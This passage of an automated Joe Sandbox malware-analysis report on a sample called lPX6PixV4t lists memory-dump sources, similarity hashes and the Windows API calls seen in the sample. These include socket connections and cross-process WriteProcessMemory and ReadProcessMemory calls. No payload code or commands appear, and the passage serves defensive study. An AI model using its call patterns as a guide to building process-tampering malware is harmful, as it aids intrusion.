                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorLast$closesocketconnectinet_addrsocket
                          • String ID:
                          • API String ID: 245547762-0
                          • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                          • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                          • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                          • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 004471D8
                          • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                          • SelectObject.GDI32(?,00000000), ref: 00447228
                          • BeginPath.GDI32(?), ref: 0044723D
                          • SelectObject.GDI32(?,00000000), ref: 00447266
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Object$Select$BeginCreateDeletePath
                          • String ID:
                          • API String ID: 2338827641-0
                          • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                          • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                          • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                          • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 00434598
                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                          • Sleep.KERNEL32(00000000), ref: 004345D4
                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CounterPerformanceQuerySleep
                          • String ID:
                          • API String ID: 2875609808-0
                          • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                          • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                          • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                          • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                          • MessageBeep.USER32(00000000), ref: 00460C46
                          • KillTimer.USER32(?,0000040A), ref: 00460C68
                          • EndDialog.USER32(?,00000001), ref: 00460C83
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                          • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                          • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                          • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Destroy$DeleteObjectWindow$Icon
                          • String ID:
                          • API String ID: 4023252218-0
                          • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                          • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                          • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                          • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                          APIs
                          • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                          • DeleteObject.GDI32(?), ref: 00455736
                          • DeleteObject.GDI32(?), ref: 00455744
                          • DestroyIcon.USER32(?), ref: 00455752
                          • DestroyWindow.USER32(?), ref: 00455760
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: DeleteDestroyObject$IconMessageSendWindow
                          • String ID:
                          • API String ID: 1489400265-0
                          • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                          • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                          • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                          • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                          APIs
                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                          • DestroyWindow.USER32(?), ref: 00455728
                          • DeleteObject.GDI32(?), ref: 00455736
                          • DeleteObject.GDI32(?), ref: 00455744
                          • DestroyIcon.USER32(?), ref: 00455752
                          • DestroyWindow.USER32(?), ref: 00455760
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                          • String ID:
                          • API String ID: 1042038666-0
                          • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                          • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                          • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                          • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                          APIs
                          • __getptd.LIBCMT ref: 0041780F
                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                          • __getptd.LIBCMT ref: 00417826
                          • __amsg_exit.LIBCMT ref: 00417834
                          • __lock.LIBCMT ref: 00417844
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                          • String ID:
                          • API String ID: 938513278-0
                          • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                          • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                          • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                          • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                          APIs
                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                          • ExitThread.KERNEL32 ref: 00413D4E
                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                          • __freefls@4.LIBCMT ref: 00413D74
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                          • String ID:
                          • API String ID: 2403457894-0
                          • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                          • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                          • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                          • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                          APIs
                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                          • ExitThread.KERNEL32 ref: 004151ED
                          • __freefls@4.LIBCMT ref: 00415209
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                          • String ID:
                          • API String ID: 4247068974-0
                          • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                          • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                          • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                          • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID: )$U$\
                          • API String ID: 0-3705770531
                          • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                          • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                          • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                          • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                          APIs
                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                          • CoInitialize.OLE32(00000000), ref: 0046E505
                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                          • CoUninitialize.OLE32 ref: 0046E53D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                          • String ID: .lnk
                          • API String ID: 886957087-24824748
                          • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                          • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                          • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                          • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: \
                          • API String ID: 4104443479-2967466578
                          • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                          • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                          • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                          • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: \
                          • API String ID: 4104443479-2967466578
                          • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                          • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                          • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                          • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: \
                          • API String ID: 4104443479-2967466578
                          • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                          • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                          • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                          • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                          Strings
                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                          • API String ID: 708495834-557222456
                          • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                          • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                          • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                          • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                          APIs
                            • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                            • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
